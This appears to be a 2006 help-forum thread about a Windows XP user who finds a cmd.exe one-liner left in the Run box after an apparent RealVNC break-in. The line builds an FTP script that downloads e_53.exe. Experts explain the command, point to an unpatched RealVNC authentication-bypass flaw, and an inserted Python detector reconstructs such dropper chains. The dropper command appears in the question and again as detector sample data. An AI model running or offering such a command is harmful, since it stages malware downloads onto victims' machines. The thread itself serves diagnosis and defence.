Solved

Have I been hacked ?

Posted on 2006-11-02
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
Question by: EugeneGardner
6 Comments
 
Accepted Solution by: FixingStuff (LVL 9, earned 40 total points)
ID: 17863044
Looks like there was a hack attempt. The command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it tries to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run ShieldsUP to check your open ports to the world.
www.grc.com

FS-
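As an added example (not code from the thread, from RealVNC, or from any of the posters), here is a small Python detector that does for a batch of process-creation command lines what the accepted answer does by hand: it spots the "echo ... > file" chain followed by "ftp -s:file", reconstructs the FTP script, and pulls out the host, port, login and fetched filename so they can be used as indicators for blocking and hunting. The first sample command line is the string from the question (left cut off after "&e" exactly as posted); the other two are constructed benign-looking lines. The dataclass, function names and regexes are my own choices, not anything from the page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample process-creation command lines. The first reproduces the string from the
# question (it is cut off after "&e" in the post and is left that way here); the other
# two are constructed samples to show what the detector does and does not flag.
SAMPLE_COMMAND_LINES = [
    "cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e",
    "cmd.exe /c echo build ok > status.txt",
    "cmd.exe /c del temp.log & ftp -n -s:upload.txt",
]

# "ftp ... -s:<file>" makes the Windows ftp client run the commands in <file> as a script.
FTP_SCRIPT_RE = re.compile(r"\bftp\b[^&]*?-s:(\S+)", re.IGNORECASE)
# "echo <text> > <file>" or "echo <text> >> <file>" writes or appends one script line.
ECHO_REDIRECT_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.IGNORECASE)


@dataclass
class FtpDropperFinding:
    """What the reconstructed FTP script would do (hypothetical structure, chosen for this example)."""
    script_file: str
    inline_script: bool = False  # True when the script was built with echo redirects in the same command
    host: Optional[str] = None
    port: Optional[str] = None
    user: Optional[str] = None
    fetched: List[str] = field(default_factory=list)
    script_lines: List[str] = field(default_factory=list)


def parse_ftp_dropper(cmdline: str) -> Optional[FtpDropperFinding]:
    """Return a finding when cmdline runs ftp with a script file; reconstruct the script if it is written inline."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    finding = FtpDropperFinding(script_file=m.group(1))
    # cmd.exe chains commands with '&'; splitting on it is enough for this one-liner style.
    for fragment in cmdline.split("&"):
        em = ECHO_REDIRECT_RE.match(fragment.strip())
        if not em or em.group(2) != finding.script_file:
            continue
        line = em.group(1).strip()
        finding.script_lines.append(line)
        tokens = line.split()
        verb = tokens[0].lower() if tokens else ""
        if verb == "open" and len(tokens) >= 2:
            finding.host = tokens[1]
            finding.port = tokens[2] if len(tokens) >= 3 else "21"  # ftp defaults to port 21
        elif verb == "user" and len(tokens) >= 2:
            finding.user = tokens[1]
        elif verb in ("get", "mget") and len(tokens) >= 2:
            finding.fetched.extend(tokens[1:])
    finding.inline_script = bool(finding.script_lines)
    return finding


def scan(cmdlines: List[str]) -> List[FtpDropperFinding]:
    """Run the parser over a batch of command lines and keep only the hits."""
    return [f for f in (parse_ftp_dropper(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding)
```

Run against the thread's string, the detector reports script file `i`, host `127.0.0.1`, port `31006`, user `1` and fetched file `e_53.exe`, with the four reconstructed script lines. As the posters note, the script only stages the file; nothing in it executes what was fetched, so the value of the finding is in the indicators (the listening port and the filename) rather than in any observed damage. A bare `ftp -s:file` without the inline echo chain is still returned, with `inline_script` set to False, so a rule can treat it at lower confidence; an ordinary `echo ... > file` with no ftp invocation is not reported at all.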
 
Author Comment by: EugeneGardner (LVL 1)
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my RealVNC connection is password protected.  And where would the e_53.exe file be dropped?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be?  There is no execute command!
 
Expert Comment by: FixingStuff (LVL 9)
ID: 17868447
Good that you are secure!
You probably should go back to GRC ShieldsUP and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
 
Assisted Solution by: briancassin (LVL 21, earned 20 total points)
ID: 17871591
This issue seems to be directly related to RealVNC.

How old is it?

Because there was a serious security flaw found back around May of this year. If you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users to access a remote computer from a local PC. The company distributes the software in three versions: free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
 
Author Comment by: EugeneGardner (LVL 1)
ID: 17872691
Ahh - good point.  I'm running version 4.1.1.  I have just downloaded version 4.1.2.
Thanks.
 
Expert Comment by: FixingStuff (LVL 9)
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-